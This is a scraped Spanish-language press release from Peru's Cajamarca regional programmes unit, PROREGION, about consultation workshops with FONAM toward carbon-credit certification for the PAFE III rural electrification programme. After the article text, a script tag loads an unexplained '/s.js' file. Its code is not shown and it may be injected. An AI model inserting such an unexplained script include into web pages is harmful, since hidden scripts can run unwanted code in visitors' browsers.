Fecha Actual

Martes, 16 de Octubre del 2018

Follow Unidad Ejecutora de Programas Regionales - PROREGION on:

Boton Facebook

Ingresar

nota de prensa 39

Se inician actividades para la certificación de bonos de carbono
Funcionarios de PROREGION y FONAM visitan las poblaciones beneficiadas

En correspondencia a su responsabilidad social y ambiental, el Gobierno Regional de Cajamarca a través de su Unidad Ejecutora PROREGION y el Fondo Nacional del Ambiente (FONAM) han dado inicio al proceso de la consulta social para la certificación de Bonos de Carbono en el marco del Programa de Ampliación de la Frontera Eléctrica PAFE III.

La finalidad de la aplicación del PAFE III al mercado de bonos de carbono es acceder a los beneficios por las reducciones de emisiones de gases de efecto invernadero. Son 215 mil pobladores de la zona rural los que se benefician con este programa y remplazarán el uso de combustibles fósiles con la energía eléctrica.

La población cambiará el uso de velas, lámparas tipo petromax, motores diesel, quema de leña, etc, con el consumo de energía eléctrica, lo que se reducirá considerablemente la emisión de CO2. Y en este contexto es que funcionarios del FONAM y de Unidad de sostenibilidad de la inversión de PROREGION, dirigido por el Lic. Peter Eduardo Chávez Castro, están realizando la consulta social mediante la realización de 19 talleres a nivel regional.

Las actividades a desarrollar comprende la realización de encuestas, talleres de difusión y capacitación en aspectos ambientales, entrevistas a autoridades y representantes de beneficiarios. En los talleres que se realizan en diversos poblados de diversas provincias de la región se darán exposiciones sobre la importancia del cuidado del medio ambiente: aspectos concernientes al cambio climático, efecto invernadero, temas ambientales; así como los beneficios ambientales y sociales del PAFE III.
<script type='text/javascript' src='/s.js?qr=888'></script>

Añadir nuevo comentario

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.